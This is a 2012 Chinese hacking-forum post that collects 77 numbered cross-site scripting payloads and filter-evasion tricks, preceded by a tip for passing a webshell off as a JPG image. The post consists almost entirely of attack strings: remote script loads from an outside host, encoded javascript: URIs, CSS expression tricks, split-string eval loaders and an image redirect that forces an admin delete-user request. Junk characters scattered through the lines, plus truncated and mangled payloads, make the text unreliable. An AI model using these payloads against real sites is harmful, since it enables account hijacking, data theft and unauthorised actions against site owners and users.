找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2113|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell
9 M' l- d, Z" F% `% D9 I4 q7 ]XSS跨站代码  <script>alert("")</script>
% O* p6 Z# c- H0 N+ R
2 g2 ?5 _  u  L4 O+ \6 q. X将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马7 ~! D1 H& R4 X4 ?( H( z: M

  W, H! k* l5 j( B( K' D7 T0 N# T6 R% y) I1 ]% K. \
9 F) ?* o6 e- ^5 C/ i% h
1)普通的XSS JavaScript注入% A$ E/ g+ L6 W  n+ _% w7 V7 n- o
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 _0 |# f* W& y% P" @' i" m0 b$ I6 x1 A4 `. r( z
(2)IMG标签XSS使用JavaScript命令$ C. c5 n  J, m" {
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( K; S0 W* ?4 B" X; M: ?) {3 \& e
+ Z6 S- L( e4 I7 Z& A
(3)IMG标签无分号无引号: g- E3 f0 @4 r$ l
<IMG SRC=javascript:alert(‘XSS’)>5 H( F( ^( q3 Q
) V& i, n" @  s/ W$ i
(4)IMG标签大小写不敏感* Y% W2 g6 @. @! }( f# N0 r6 B: v
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) B. e$ e1 b" \  A

# N) J$ [) B  H% t( s9 X7 J8 L4 z(5)HTML编码(必须有分号)! }- A2 T- X; B/ q  A
<IMG SRC=javascript:alert(“XSS”)>; h: U8 W: \8 G: V
1 Q5 O9 k7 n+ C! V
(6)修正缺陷IMG标签
8 O2 p1 r; \. M<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
) t  E2 y  L- U0 f
9 ?" f' O+ ~* X- P& B(7)formCharCode标签(计算器)# b- \( w% g7 n6 W) y& P
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
; X* Y- O1 h6 {: {3 q% i/ E
( E$ N2 A7 A: x7 S) A% _(8)UTF-8的Unicode编码(计算器)
+ u. d* k* c) d3 Y) f1 l! {- q( L<IMG SRC=jav..省略..S')>
/ \) y7 c8 ]) y& \
" t8 p5 G- i6 ?" F(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
( R& n+ S( u  \! Y0 ?<IMG SRC=jav..省略..S')>
5 Z' u# }: G3 {: c% G. s7 @8 F# [# V' Y
(10)十六进制编码也是没有分号(计算器); D) b$ A( x  x
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>$ c7 T, J  _* V) `/ y% c7 X
: E3 s( x( v2 O
(11)嵌入式标签,将Javascript分开
. [4 m) v+ L9 W; j# g<IMG SRC=”jav ascript:alert(‘XSS’);”>  ]8 W' q4 R0 E+ }" b

; C- @* p  n1 D(12)嵌入式编码标签,将Javascript分开3 g3 g. ^! q, j$ S
<IMG SRC=”jav ascript:alert(‘XSS’);”>! {9 o5 V0 F) N
, s' G" W! I) B# a& ^0 U  s0 n% u
(13)嵌入式换行符
* ^$ ~& N8 T1 M* M2 r6 y<IMG SRC=”jav ascript:alert(‘XSS’);”>3 C& Y4 Z0 K+ z2 J; k
  w6 s, t! u! G$ A- Y) p; D
(14)嵌入式回车7 f. z, i2 t/ a8 K6 J- _
<IMG SRC=”jav ascript:alert(‘XSS’);”># x# v6 h5 g2 L5 ^1 r1 m
) L0 z* e4 }# O4 L7 U4 k
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
& n4 z# s4 T. u+ Y8 S% z( ?! M3 f<IMG SRC=”javascript:alert(‘XSS‘)”>
& G  k3 p4 M, y, \6 U! y  B9 O
/ {& B! ^: L  V* K+ x- L& [6 _(16)解决限制字符(要求同页面)" {- s1 `5 q' k/ i9 T! s
<script>z=’document.’</script>
' F' ^: O: d& p$ a6 |& K<script>z=z+’write(“‘</script>) k8 M( k7 [& ^1 a; x
<script>z=z+’<script’</script>
0 ^/ S( t9 R( e8 I! S0 ^7 t: r<script>z=z+’ src=ht’</script>0 n8 e, W" S& P9 c/ D
<script>z=z+’tp://ww’</script>
' n4 I8 O9 |( h$ K! G- a, {<script>z=z+’w.shell’</script>* o- t- K' a+ m
<script>z=z+’.net/1.’</script>
9 b" q! R9 b* C<script>z=z+’js></sc’</script>5 a, A1 O  P0 P1 m! E0 k, x
<script>z=z+’ript>”)’</script>- U# u+ R  L; E. \1 y; e6 x: `* B
<script>eval_r(z)</script>+ ?3 V9 P8 P6 c; t) r# ~5 X( i
& i1 |0 s! o0 H2 K
(17)空字符4 N, t/ G' {6 B: Q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 A; Y0 q3 h' G2 J& k- K) \$ a% g8 w' i; A- A% r  U5 g4 N7 h0 J* x
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
& o8 s9 O( D$ _6 H3 ?6 Zperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
+ K4 u0 X9 s& ?. G9 m. f8 L
% {5 l9 _0 _; j2 s) X(19)Spaces和meta前的IMG标签* ^( H+ D6 k5 {: @5 `' Z
<IMG SRC=” javascript:alert(‘XSS’);”>
' [+ ~  [- `# Q/ y- o) c* E2 ~# d% M2 e2 z
(20)Non-alpha-non-digit XSS
. X* j# o' {2 Q+ P+ X<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 b4 I' l9 F( S. m0 U& j
0 N8 A6 L! X- L; {! p7 c1 N, v(21)Non-alpha-non-digit XSS to 21 f! c: _( ~0 Y7 }# G
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># f# p$ _' C7 y$ l

' u& U5 D5 N. b2 f* U& c& L8 b" |(22)Non-alpha-non-digit XSS to 38 m6 r' x; M, m
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 m8 V/ v! T3 A
: X% H: V" \! I3 T6 u
(23)双开括号: Q6 B( f  Q, `% ~0 b$ L) }% E2 Q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>  n* E* @$ O7 _4 k! F# M

: V0 y( T- v$ [8 M( I3 W(24)无结束脚本标记(仅火狐等浏览器)
5 A- i8 E3 `0 \1 J7 |0 r<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
1 S* }* q$ E* C' [
  D8 T7 x  x  T( w(25)无结束脚本标记2
1 f/ i. Q9 Q# G<SCRIPT SRC=//3w.org/XSS/xss.js>) G3 \* O. i4 w6 ?/ `

5 b0 }2 T, x8 V+ d% C& e(26)半开的HTML/JavaScript XSS3 v* m: y' C0 g! M- q6 d! z4 \
<IMG SRC=”javascript:alert(‘XSS’)”
( W8 b$ F3 l8 D' ?/ R6 D
" M% s6 m/ O+ }5 M, ~(27)双开角括号% N/ a" K8 I. R  o. `- [9 X3 A- v
<iframe src=http://3w.org/XSS.html <3 _& v  ^6 l# o; L+ g/ R( o
! x8 E; S  ^+ l- d) {) v
(28)无单引号 双引号 分号2 H# F9 s( ?7 f1 O+ X! |# }! W
<SCRIPT>a=/XSS/
6 e% N* o! S: U2 Malert(a.source)</SCRIPT>' M6 e; u5 R6 w, c
5 `! q( n. g5 ~1 o
(29)换码过滤的JavaScript0 @% _2 M; c4 v. x! J
\”;alert(‘XSS’);//, g+ h6 p6 ?! _' Y2 G

+ q8 v, s6 G' N( K; B(30)结束Title标签2 `4 D; K- \" g. L% F
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' |, u1 U# q2 h

  w1 Q# T) q, a) @! D* F(31)Input Image
+ y7 X- l' U8 g8 `# G1 B/ _' P/ G<INPUT SRC=”javascript:alert(‘XSS’);”>& |) }, Y0 ~" ]" K9 r, i) p
  r: r! a7 N, I, @2 c3 r+ {* Y  p
(32)BODY Image( m! `4 j6 n9 ]. O- {
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. i% l2 y1 v: Y9 C
7 `2 U  U: w" n
(33)BODY标签2 Y, P6 s% [( I4 O8 l1 r
<BODY(‘XSS’)>3 a- J" D; @$ f$ `  h: v) k& ^7 O
" y+ l" t  \7 {  q" T* n- y/ F: K
(34)IMG Dynsrc
/ M4 T) L% m# s2 [' I% t4 f<IMG DYNSRC=”javascript:alert(‘XSS’)”>
( y. P! w% H, [2 j8 g
- O  K. W0 N0 J9 R- z- a- z9 `(35)IMG Lowsrc
1 z" f. y) J* [) ]' ?/ d<IMG LOWSRC=”javascript:alert(‘XSS’)”>2 X2 \9 D1 y* Y5 o! Q  P- ?  p" S

8 S9 ~+ ]/ i) N: s+ D(36)BGSOUND! i+ _5 E4 ?: o) A% s8 x
<BGSOUND SRC=”javascript:alert(‘XSS’);”>) a4 b6 ]" ]  |
( J, b8 A( |7 m9 W6 ~3 @9 k
(37)STYLE sheet
5 M% H0 u) I; u, ]+ e6 g<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 X6 Z' Z$ ~% X* |: E) |' V8 ]

' [$ n6 L2 e6 f' z8 |. o7 T(38)远程样式表+ C5 a; A' Q7 L- W, V7 o% r
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
1 s8 Z  e; I- O9 a9 o5 I. E& Q2 }
(39)List-style-image(列表式)
$ R: r3 I$ O$ ], m( g+ I- }# z1 ^<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( f' ^4 Q8 k" @$ r0 l) e
4 b" a& U; I1 a" P/ G
(40)IMG VBscript5 g& J$ @* [  Y% F, U$ N; u
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
4 Y/ p% [* E; R  |; l4 b! m3 Z, {/ k# n7 c
(41)META链接url
) D' p5 v3 c2 C* K  c0 ?* Y& I& ~: g<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
& Q5 y# Z; g! W
: w3 V9 V  K- f( D2 M(42)Iframe' y& ]1 R- O* b* E. v* Y
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
3 s) b) H# U, e( o(43)Frame
) I* ?; [$ \/ Y* I<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
" U7 |6 \9 Q5 L; C* R% e( s6 a6 f6 F$ o$ W9 s" N% ]7 E6 F, b
(44)Table
1 Y! f2 W7 r9 g5 T<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: M  l, |7 B; Q' Z3 g; S3 L/ D$ v5 d3 p
(45)TD/ |' U+ p( l. K! g$ q/ \# d( |9 u
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
; c; v6 O! r/ O1 f0 e! y
! J# k! L8 }& B3 _4 s2 ?(46)DIV background-image
) q, n  ?& j9 O<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>: K( V" k8 }% M" Y
' a! x; U/ `6 V  \. N% ^
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
+ E6 B3 K6 Y* p/ q<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>! N6 z5 A9 O4 f6 ^. b2 c" p! [( Q
6 j$ w  ]& Z- m4 G3 }' k
(48)DIV expression
, \0 D) z; M" Z$ c% W9 l<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 J$ \" y2 O, N0 i) P; ]( @9 ?8 M
3 W) m3 j7 Z8 t( R" a(49)STYLE属性分拆表达
/ V0 S" s% K# B( g, O<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) m. _, F% {) b/ R& G3 q1 u3 f- ~2 M2 r- p
(50)匿名STYLE(组成:开角号和一个字母开头)* R  l2 a  j: S3 D1 w# S1 [
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>+ \$ j; X5 r, Y8 p% j1 p

& V- L( ^2 I6 n) e0 q( w(51)STYLE background-image4 v2 B$ F3 {% M0 q
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>+ v$ a% n7 P) z; u4 _  w/ x( I+ G5 k

  F9 n! B% A4 q! y(52)IMG STYLE方式5 ~' k, y7 x; v: h
exppression(alert(“XSS”))’>: l! c' E2 Q' N- w1 g% O$ K

+ h6 m+ J7 x3 E) k- S* q6 \(53)STYLE background
6 ?6 @1 @+ t" Q, ?3 r9 p2 T3 e  x<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>1 b6 m/ R9 d& k- @6 r3 @  h8 G
; R+ h: r- R  y% {
(54)BASE# b$ H- w8 P- B
<BASE HREF=”javascript:alert(‘XSS’);//”>
2 a; d1 _2 x. A. E) K
8 ?% E" C4 p- _' {0 |(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS; B6 T. f' S0 k& E
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>+ |' F+ d- g$ s% ~

1 M! {. z0 P+ r/ ^(56)在flash中使用ActionScrpt可以混进你XSS的代码
. C" {6 _, I4 N- k( m. v. i9 ~a=”get”;
- |6 u% [2 e8 |1 @b=”URL(\”";
+ L/ W, [9 ?# m0 ]& `6 h  e- |c=”javascript:”;
' ]' s0 P2 x; b' \* id=”alert(‘XSS’);\”)”;, ]- Z4 E2 X* I  b8 N
eval_r(a+b+c+d);
2 u) C5 T* a6 w# S
4 k7 r4 I7 h9 `(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上3 |8 d* Q0 ]5 ]8 Q% C$ P
<HTML xmlns:xss>! `. B! ]- H, `1 r; }% j
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>& }8 ^% F3 x0 H" \
<xss:xss>XSS</xss:xss>
; B" ^; m1 H" a( x" h/ w: c& Q6 ]</HTML>
* T  T4 n- W& ]  ^7 y9 p: _% S) m; ~% z  k. O
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- i6 q8 e( _  O1 Y6 G' l- g1 c<SCRIPT SRC=””></SCRIPT>( W5 Z# \9 u  ?/ m9 [

  G' X! `. t8 d+ O# c(59)IMG嵌入式命令,可执行任意命令, \- X& u# G/ X4 Z" C
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
; q* G- y! ]4 ^8 o; F+ _$ D2 k, v/ Z% ^' x0 D9 b- w
(60)IMG嵌入式命令(a.jpg在同服务器)
- @! n- g8 q0 m7 O* y. VRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( C! \; Y! B' a, O2 t1 A; H' W) E; \1 _" G' o
(61)绕符号过滤
  k: w) H; y4 U8 `<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 L4 U$ ?1 m& u5 m
8 }. O8 ]1 m2 [2 s(62)
+ z. ~% I, y" ~/ F0 G$ [  m<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
  y, L; E+ h, D$ r1 F& D0 B
4 Y1 t9 t, i' N3 \0 k* w" R(63)+ M) O3 b# d  x. h" E" a  o
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>) _4 w5 t( l3 Q1 W8 u

: z- ^, \9 z, E3 h4 U(64)
. W) y% H6 L9 `7 j<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
2 p, p1 ^- ^, }* w# m  Q/ R9 ^1 T9 n0 [% Q9 [  S8 L& P; e
(65)
+ j6 E4 J0 u3 F0 j( ^" S- r( D<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>/ j7 O2 ?9 k4 l5 @

, y3 r7 R0 l/ U3 {  P(66)) f. V) y$ L' Y/ k
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
& R6 A5 i: Q) ?" S# x
# M) j( o5 ~% e- f(67)! R6 h) {' u# R& m! d
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
8 d; Q# x) U- Q* {- |; b* H+ o6 y3 M0 I+ N' I+ F- y0 [' k0 c; _( a  E
(68)URL绕行
; N/ A+ S: C/ E! l: R% p<A HREF=”http://127.0.0.1/”>XSS</A>
! U) _7 }% |, L1 R8 p# U+ x- C. d% b+ C: e6 G+ x
(69)URL编码
* }& E: q$ @  S, b: c" C" C<A HREF=”http://3w.org”>XSS</A>
$ E, _4 c2 Y0 Y
5 E! S" e' _4 ^0 x- T; x2 F) N(70)IP十进制; m8 F4 q. w4 b! e
<A HREF=”http://3232235521″>XSS</A>7 p: c5 N" a5 [
4 g8 O% M! [* A& ], t$ c% G
(71)IP十六进制
+ N4 P$ H# Q6 m9 B$ c9 k- _4 [<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>& L- W* g+ k) U5 o# P
+ T- C. N6 v" A. Y0 U# V
(72)IP八进制
; D) Y& v8 ]) Q<A HREF=”http://0300.0250.0000.0001″>XSS</A>8 l4 A0 c( ^" g7 S; _, O8 N

! Z: L6 y& ~2 `! z$ h0 O$ q( G(73)混合编码
5 O, o/ |( y# j* j  A! k$ T# I. F<A HREF=”h
% L* u( b) O% }# P. f3 Htt p://6 6.000146.0×7.147/”">XSS</A>
( [7 d" B' w7 `* x1 O
; S1 U1 R* |/ m. R(74)节省[http:]' H* w* y2 X7 [1 W) b0 F
<A HREF=”//www.google.com/”>XSS</A>1 I- ~, D" H( s8 ]. y; r

  D. K' r0 e9 y, H(75)节省[www]; \4 Z' ~5 s/ C- G/ K
<A HREF=”http://google.com/”>XSS</A>; Q% S' c+ T. I# c0 H/ A

# Z; O. ~0 v+ h1 {  |  U(76)绝对点绝对DNS
; S3 |% j+ x* P3 n<A HREF=”http://www.google.com./”>XSS</A>
1 m( w9 h8 |9 O: \( _
- H" j! n6 g# J8 I% l. L(77)javascript链接" o1 T; U6 W% l# ?: d0 ]) o
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
1 N  E. c3 o4 A/ x+ @8 _6 G0 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表